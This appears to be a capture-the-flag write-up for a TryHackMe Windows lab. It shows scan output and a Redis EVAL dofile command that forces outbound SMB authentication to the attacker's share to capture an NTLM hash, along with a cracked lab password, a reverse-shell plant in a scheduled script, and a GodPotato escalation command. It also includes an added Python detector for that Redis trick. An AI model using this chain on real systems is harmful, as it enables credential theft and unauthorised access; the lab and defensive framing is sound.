TryHackMe - VulnNet Active

Enumeration

➜  ~ rustscan -a 10.10.241.222 -- -Pn
...
Open 10.10.241.222:53
Open 10.10.241.222:135
Open 10.10.241.222:139
Open 10.10.241.222:445
Open 10.10.241.222:464
Open 10.10.241.222:6379
Open 10.10.241.222:9389

Redis Exploration

Connected to Redis anonymously:

➜  ~ redis-cli -h 10.10.241.222 -p 6379
10.10.241.222:6379> info
...
redis_version:2.8.2402

Exploitation

Capturing NTLM Hash

Used Redis EVAL (Lua dofile) to make the server open an SMB connection to a listener on the attacking machine, which captures the NTLM hash of the account Redis runs as:

# On attacker machine
sudo smbserver.py share ./share/ -smb2support

# In Redis CLI
eval "dofile('//10.2.30.143/share')" 0

Captured and cracked the hash for enterprise-security:

- Password: sand_0873959498
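From the defender's side, the EVAL/dofile step above is visible in Redis command monitoring. The following is an added example, not part of the original writeup: a small Python scanner over constructed redis-cli MONITOR lines that flags EVAL or SCRIPT LOAD bodies which load files or reference UNC-style paths.

```python
import re

# One line of `redis-cli MONITOR` output looks like (timestamp, db, client, quoted args):
#   1700000000.000003 [0 10.2.30.143:40222] "eval" "dofile('//10.2.30.143/share')" "0"
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Lua constructs and path shapes that mean the script reaches outside the keyspace.
# The UNC pattern also matches URLs, so treat that hit as a lead, not proof.
SUSPICIOUS = [
    (re.compile(r'\b(dofile|loadfile|require)\s*\(', re.I), "lua file loader"),
    (re.compile(r'\bio\.(open|popen|lines)\s*\(', re.I), "lua io call"),
    (re.compile(r'(//|\\\\)[\w.-]+[/\\][\w$.-]+'), "UNC-style path (outbound SMB auth)"),
]

def parse_monitor_line(line):
    """Return {'ts','client','command','args'} for a MONITOR line, or None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"') for a in ARG_RE.findall(m.group("args"))]
    if not args:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "command": args[0].lower(), "args": args[1:]}

def flag_entry(entry):
    """List the reasons an EVAL / SCRIPT LOAD entry looks like file or network access.
    EVALSHA carries only a hash, so the body has to be caught at SCRIPT LOAD time."""
    if entry is None or entry["command"] not in ("eval", "script"):
        return []
    body = " ".join(entry["args"])
    return [label for pattern, label in SUSPICIOUS if pattern.search(body)]

def scan(lines):
    # Return (client, command, reasons) for every flagged line.
    alerts = []
    for line in lines:
        entry = parse_monitor_line(line)
        reasons = flag_entry(entry)
        if reasons:
            alerts.append((entry["client"], entry["command"], reasons))
    return alerts

# Constructed sample MONITOR output: normal traffic plus the dofile trick from this writeup.
SAMPLE = [
    '1700000000.000001 [0 10.10.14.5:40100] "info"',
    '1700000000.000002 [0 10.10.14.5:40100] "set" "session:42" "ok"',
    '1700000000.000003 [0 10.2.30.143:40222] "eval" "dofile(\'//10.2.30.143/share\')" "0"',
    '1700000000.000004 [0 10.10.14.5:40100] "eval" "return redis.call(\'get\', KEYS[1])" "1" "session:42"',
]
```

Running `scan(SAMPLE)` reports only the third line, with both the file-loader and UNC-path reasons; the legitimate redis.call script is not flagged.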

SMB Access

Accessed Enterprise-Share:

➜  tmp smbclient //10.10.85.177/Enterprise-Share --user enterprise-security%sand_0873959498
smb: \> get PurgeIrrelevantData_1826.ps1

The script is likely run by a scheduled task. Modified it to include a PowerShell reverse shell and uploaded it back to the share.

Privilege Escalation

Once a shell was obtained as enterprise-security, checked privileges:

whoami /priv
...
SeImpersonatePrivilege Impersonate a client after authentication Enabled

Used GodPotato to escalate to NT AUTHORITY\SYSTEM:

./godp4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\system.txt"